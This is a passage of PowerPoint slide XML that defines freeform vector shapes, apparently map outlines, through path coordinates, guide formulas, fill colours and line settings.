                    <a:lnTo>
                      <a:pt x="99" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="63"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36091" name="Freeform 224"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2997" y="2061"/>
                <a:ext cx="108" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 41 w 108"/>
                  <a:gd name="T1" fmla="*/ 63 h 66"/>
                  <a:gd name="T2" fmla="*/ 36 w 108"/>
                  <a:gd name="T3" fmla="*/ 65 h 66"/>
                  <a:gd name="T4" fmla="*/ 33 w 108"/>
                  <a:gd name="T5" fmla="*/ 65 h 66"/>
                  <a:gd name="T6" fmla="*/ 28 w 108"/>
                  <a:gd name="T7" fmla="*/ 66 h 66"/>
                  <a:gd name="T8" fmla="*/ 24 w 108"/>
                  <a:gd name="T9" fmla="*/ 65 h 66"/>
                  <a:gd name="T10" fmla="*/ 16 w 108"/>
                  <a:gd name="T11" fmla="*/ 58 h 66"/>
                  <a:gd name="T12" fmla="*/ 6 w 108"/>
                  <a:gd name="T13" fmla="*/ 51 h 66"/>
                  <a:gd name="T14" fmla="*/ 5 w 108"/>
                  <a:gd name="T15" fmla="*/ 49 h 66"/>
                  <a:gd name="T16" fmla="*/ 2 w 108"/>
                  <a:gd name="T17" fmla="*/ 46 h 66"/>
                  <a:gd name="T18" fmla="*/ 0 w 108"/>
                  <a:gd name="T19" fmla="*/ 40 h 66"/>
                  <a:gd name="T20" fmla="*/ 2 w 108"/>
                  <a:gd name="T21" fmla="*/ 37 h 66"/>
                  <a:gd name="T22" fmla="*/ 4 w 108"/>
                  <a:gd name="T23" fmla="*/ 34 h 66"/>
                  <a:gd name="T24" fmla="*/ 2 w 108"/>
                  <a:gd name="T25" fmla="*/ 32 h 66"/>
                  <a:gd name="T26" fmla="*/ 2 w 108"/>
                  <a:gd name="T27" fmla="*/ 28 h 66"/>
                  <a:gd name="T28" fmla="*/ 5 w 108"/>
                  <a:gd name="T29" fmla="*/ 27 h 66"/>
                  <a:gd name="T30" fmla="*/ 6 w 108"/>
                  <a:gd name="T31" fmla="*/ 25 h 66"/>
                  <a:gd name="T32" fmla="*/ 5 w 108"/>
                  <a:gd name="T33" fmla="*/ 23 h 66"/>
                  <a:gd name="T34" fmla="*/ 2 w 108"/>
                  <a:gd name="T35" fmla="*/ 22 h 66"/>
                  <a:gd name="T36" fmla="*/ 4 w 108"/>
                  <a:gd name="T37" fmla="*/ 20 h 66"/>
                  <a:gd name="T38" fmla="*/ 6 w 108"/>
                  <a:gd name="T39" fmla="*/ 20 h 66"/>
                  <a:gd name="T40" fmla="*/ 7 w 108"/>
                  <a:gd name="T41" fmla="*/ 21 h 66"/>
                  <a:gd name="T42" fmla="*/ 12 w 108"/>
                  <a:gd name="T43" fmla="*/ 21 h 66"/>
                  <a:gd name="T44" fmla="*/ 12 w 108"/>
                  <a:gd name="T45" fmla="*/ 17 h 66"/>
                  <a:gd name="T46" fmla="*/ 17 w 108"/>
                  <a:gd name="T47" fmla="*/ 14 h 66"/>
                  <a:gd name="T48" fmla="*/ 19 w 108"/>
                  <a:gd name="T49" fmla="*/ 12 h 66"/>
                  <a:gd name="T50" fmla="*/ 22 w 108"/>
                  <a:gd name="T51" fmla="*/ 14 h 66"/>
                  <a:gd name="T52" fmla="*/ 26 w 108"/>
                  <a:gd name="T53" fmla="*/ 16 h 66"/>
                  <a:gd name="T54" fmla="*/ 29 w 108"/>
                  <a:gd name="T55" fmla="*/ 16 h 66"/>
                  <a:gd name="T56" fmla="*/ 41 w 108"/>
                  <a:gd name="T57" fmla="*/ 17 h 66"/>
                  <a:gd name="T58" fmla="*/ 43 w 108"/>
                  <a:gd name="T59" fmla="*/ 11 h 66"/>
                  <a:gd name="T60" fmla="*/ 45 w 108"/>
                  <a:gd name="T61" fmla="*/ 11 h 66"/>
                  <a:gd name="T62" fmla="*/ 50 w 108"/>
                  <a:gd name="T63" fmla="*/ 9 h 66"/>
                  <a:gd name="T64" fmla="*/ 54 w 108"/>
                  <a:gd name="T65" fmla="*/ 8 h 66"/>
                  <a:gd name="T66" fmla="*/ 58 w 108"/>
                  <a:gd name="T67" fmla="*/ 9 h 66"/>
                  <a:gd name="T68" fmla="*/ 61 w 108"/>
                  <a:gd name="T69" fmla="*/ 9 h 66"/>
                  <a:gd name="T70" fmla="*/ 68 w 108"/>
                  <a:gd name="T71" fmla="*/ 0 h 66"/>
                  <a:gd name="T72" fmla="*/ 74 w 108"/>
                  <a:gd name="T73" fmla="*/ 0 h 66"/>
                  <a:gd name="T74" fmla="*/ 81 w 108"/>
                  <a:gd name="T75" fmla="*/ 0 h 66"/>
                  <a:gd name="T76" fmla="*/ 85 w 108"/>
                  <a:gd name="T77" fmla="*/ 3 h 66"/>
                  <a:gd name="T78" fmla="*/ 88 w 108"/>
                  <a:gd name="T79" fmla="*/ 5 h 66"/>
                  <a:gd name="T80" fmla="*/ 93 w 108"/>
                  <a:gd name="T81" fmla="*/ 4 h 66"/>
                  <a:gd name="T82" fmla="*/ 94 w 108"/>
                  <a:gd name="T83" fmla="*/ 4 h 66"/>
                  <a:gd name="T84" fmla="*/ 99 w 108"/>
                  <a:gd name="T85" fmla="*/ 7 h 66"/>
                  <a:gd name="T86" fmla="*/ 103 w 108"/>
                  <a:gd name="T87" fmla="*/ 9 h 66"/>
                  <a:gd name="T88" fmla="*/ 108 w 108"/>
                  <a:gd name="T89" fmla="*/ 13 h 66"/>
                  <a:gd name="T90" fmla="*/ 104 w 108"/>
                  <a:gd name="T91" fmla="*/ 17 h 66"/>
                  <a:gd name="T92" fmla="*/ 96 w 108"/>
                  <a:gd name="T93" fmla="*/ 20 h 66"/>
                  <a:gd name="T94" fmla="*/ 92 w 108"/>
                  <a:gd name="T95" fmla="*/ 24 h 66"/>
                  <a:gd name="T96" fmla="*/ 85 w 108"/>
                  <a:gd name="T97" fmla="*/ 39 h 66"/>
                  <a:gd name="T98" fmla="*/ 81 w 108"/>
                  <a:gd name="T99" fmla="*/ 48 h 66"/>
                  <a:gd name="T100" fmla="*/ 75 w 108"/>
                  <a:gd name="T101" fmla="*/ 54 h 66"/>
                  <a:gd name="T102" fmla="*/ 73 w 108"/>
                  <a:gd name="T103" fmla="*/ 56 h 66"/>
                  <a:gd name="T104" fmla="*/ 67 w 108"/>
                  <a:gd name="T105" fmla="*/ 56 h 66"/>
                  <a:gd name="T106" fmla="*/ 66 w 108"/>
                  <a:gd name="T107" fmla="*/ 57 h 66"/>
                  <a:gd name="T108" fmla="*/ 64 w 108"/>
                  <a:gd name="T109" fmla="*/ 57 h 66"/>
                  <a:gd name="T110" fmla="*/ 58 w 108"/>
                  <a:gd name="T111" fmla="*/ 56 h 66"/>
                  <a:gd name="T112" fmla="*/ 51 w 108"/>
                  <a:gd name="T113" fmla="*/ 57 h 66"/>
                  <a:gd name="T114" fmla="*/ 41 w 108"/>
                  <a:gd name="T115" fmla="*/ 63 h 6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08"/>
                  <a:gd name="T175" fmla="*/ 0 h 66"/>
                  <a:gd name="T176" fmla="*/ 108 w 108"/>
                  <a:gd name="T177" fmla="*/ 66 h 6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08" h="66">
                    <a:moveTo>
                      <a:pt x="41" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="63"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36092" name="Freeform 225"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2602" y="2310"/>
                <a:ext cx="327" cy="328"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 327"/>
                  <a:gd name="T1" fmla="*/ 163 h 328"/>
                  <a:gd name="T2" fmla="*/ 16 w 327"/>
                  <a:gd name="T3" fmla="*/ 149 h 328"/>
                  <a:gd name="T4" fmla="*/ 35 w 327"/>
                  <a:gd name="T5" fmla="*/ 145 h 328"/>
                  <a:gd name="T6" fmla="*/ 48 w 327"/>
                  <a:gd name="T7" fmla="*/ 137 h 328"/>
                  <a:gd name="T8" fmla="*/ 59 w 327"/>
                  <a:gd name="T9" fmla="*/ 127 h 328"/>
                  <a:gd name="T10" fmla="*/ 79 w 327"/>
                  <a:gd name="T11" fmla="*/ 117 h 328"/>
                  <a:gd name="T12" fmla="*/ 77 w 327"/>
                  <a:gd name="T13" fmla="*/ 106 h 328"/>
                  <a:gd name="T14" fmla="*/ 90 w 327"/>
                  <a:gd name="T15" fmla="*/ 103 h 328"/>
                  <a:gd name="T16" fmla="*/ 104 w 327"/>
                  <a:gd name="T17" fmla="*/ 98 h 328"/>
                  <a:gd name="T18" fmla="*/ 119 w 327"/>
                  <a:gd name="T19" fmla="*/ 88 h 328"/>
                  <a:gd name="T20" fmla="*/ 110 w 327"/>
                  <a:gd name="T21" fmla="*/ 75 h 328"/>
                  <a:gd name="T22" fmla="*/ 109 w 327"/>
                  <a:gd name="T23" fmla="*/ 49 h 328"/>
                  <a:gd name="T24" fmla="*/ 102 w 327"/>
                  <a:gd name="T25" fmla="*/ 40 h 328"/>
                  <a:gd name="T26" fmla="*/ 113 w 327"/>
                  <a:gd name="T27" fmla="*/ 37 h 328"/>
                  <a:gd name="T28" fmla="*/ 122 w 327"/>
                  <a:gd name="T29" fmla="*/ 28 h 328"/>
                  <a:gd name="T30" fmla="*/ 132 w 327"/>
                  <a:gd name="T31" fmla="*/ 26 h 328"/>
                  <a:gd name="T32" fmla="*/ 137 w 327"/>
                  <a:gd name="T33" fmla="*/ 26 h 328"/>
                  <a:gd name="T34" fmla="*/ 150 w 327"/>
                  <a:gd name="T35" fmla="*/ 14 h 328"/>
                  <a:gd name="T36" fmla="*/ 174 w 327"/>
                  <a:gd name="T37" fmla="*/ 11 h 328"/>
                  <a:gd name="T38" fmla="*/ 186 w 327"/>
                  <a:gd name="T39" fmla="*/ 10 h 328"/>
                  <a:gd name="T40" fmla="*/ 196 w 327"/>
                  <a:gd name="T41" fmla="*/ 5 h 328"/>
                  <a:gd name="T42" fmla="*/ 209 w 327"/>
                  <a:gd name="T43" fmla="*/ 6 h 328"/>
                  <a:gd name="T44" fmla="*/ 219 w 327"/>
                  <a:gd name="T45" fmla="*/ 9 h 328"/>
                  <a:gd name="T46" fmla="*/ 233 w 327"/>
                  <a:gd name="T47" fmla="*/ 5 h 328"/>
                  <a:gd name="T48" fmla="*/ 247 w 327"/>
                  <a:gd name="T49" fmla="*/ 6 h 328"/>
                  <a:gd name="T50" fmla="*/ 253 w 327"/>
                  <a:gd name="T51" fmla="*/ 1 h 328"/>
                  <a:gd name="T52" fmla="*/ 261 w 327"/>
                  <a:gd name="T53" fmla="*/ 5 h 328"/>
                  <a:gd name="T54" fmla="*/ 274 w 327"/>
                  <a:gd name="T55" fmla="*/ 4 h 328"/>
                  <a:gd name="T56" fmla="*/ 268 w 327"/>
                  <a:gd name="T57" fmla="*/ 15 h 328"/>
                  <a:gd name="T58" fmla="*/ 269 w 327"/>
                  <a:gd name="T59" fmla="*/ 41 h 328"/>
                  <a:gd name="T60" fmla="*/ 264 w 327"/>
                  <a:gd name="T61" fmla="*/ 52 h 328"/>
                  <a:gd name="T62" fmla="*/ 259 w 327"/>
                  <a:gd name="T63" fmla="*/ 72 h 328"/>
                  <a:gd name="T64" fmla="*/ 267 w 327"/>
                  <a:gd name="T65" fmla="*/ 81 h 328"/>
                  <a:gd name="T66" fmla="*/ 275 w 327"/>
                  <a:gd name="T67" fmla="*/ 94 h 328"/>
                  <a:gd name="T68" fmla="*/ 285 w 327"/>
                  <a:gd name="T69" fmla="*/ 119 h 328"/>
                  <a:gd name="T70" fmla="*/ 286 w 327"/>
                  <a:gd name="T71" fmla="*/ 136 h 328"/>
                  <a:gd name="T72" fmla="*/ 293 w 327"/>
                  <a:gd name="T73" fmla="*/ 161 h 328"/>
                  <a:gd name="T74" fmla="*/ 292 w 327"/>
                  <a:gd name="T75" fmla="*/ 179 h 328"/>
                  <a:gd name="T76" fmla="*/ 294 w 327"/>
                  <a:gd name="T77" fmla="*/ 198 h 328"/>
                  <a:gd name="T78" fmla="*/ 287 w 327"/>
                  <a:gd name="T79" fmla="*/ 204 h 328"/>
                  <a:gd name="T80" fmla="*/ 297 w 327"/>
                  <a:gd name="T81" fmla="*/ 227 h 328"/>
                  <a:gd name="T82" fmla="*/ 307 w 327"/>
                  <a:gd name="T83" fmla="*/ 233 h 328"/>
                  <a:gd name="T84" fmla="*/ 320 w 327"/>
                  <a:gd name="T85" fmla="*/ 239 h 328"/>
                  <a:gd name="T86" fmla="*/ 325 w 327"/>
                  <a:gd name="T87" fmla="*/ 252 h 328"/>
                  <a:gd name="T88" fmla="*/ 273 w 327"/>
                  <a:gd name="T89" fmla="*/ 284 h 328"/>
                  <a:gd name="T90" fmla="*/ 229 w 327"/>
                  <a:gd name="T91" fmla="*/ 320 h 328"/>
                  <a:gd name="T92" fmla="*/ 188 w 327"/>
                  <a:gd name="T93" fmla="*/ 328 h 328"/>
                  <a:gd name="T94" fmla="*/ 188 w 327"/>
                  <a:gd name="T95" fmla="*/ 314 h 328"/>
                  <a:gd name="T96" fmla="*/ 178 w 327"/>
                  <a:gd name="T97" fmla="*/ 311 h 328"/>
                  <a:gd name="T98" fmla="*/ 168 w 327"/>
                  <a:gd name="T99" fmla="*/ 308 h 328"/>
                  <a:gd name="T100" fmla="*/ 156 w 327"/>
                  <a:gd name="T101" fmla="*/ 297 h 328"/>
                  <a:gd name="T102" fmla="*/ 154 w 327"/>
                  <a:gd name="T103" fmla="*/ 291 h 328"/>
                  <a:gd name="T104" fmla="*/ 124 w 327"/>
                  <a:gd name="T105" fmla="*/ 272 h 328"/>
                  <a:gd name="T106" fmla="*/ 82 w 327"/>
                  <a:gd name="T107" fmla="*/ 240 h 328"/>
                  <a:gd name="T108" fmla="*/ 60 w 327"/>
                  <a:gd name="T109" fmla="*/ 225 h 328"/>
                  <a:gd name="T110" fmla="*/ 0 w 327"/>
                  <a:gd name="T111" fmla="*/ 186 h 328"/>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327"/>
                  <a:gd name="T169" fmla="*/ 0 h 328"/>
                  <a:gd name="T170" fmla="*/ 327 w 327"/>
                  <a:gd name="T171" fmla="*/ 328 h 328"/>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327" h="328">
                    <a:moveTo>
                      <a:pt x="0" y="186"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="149"/>
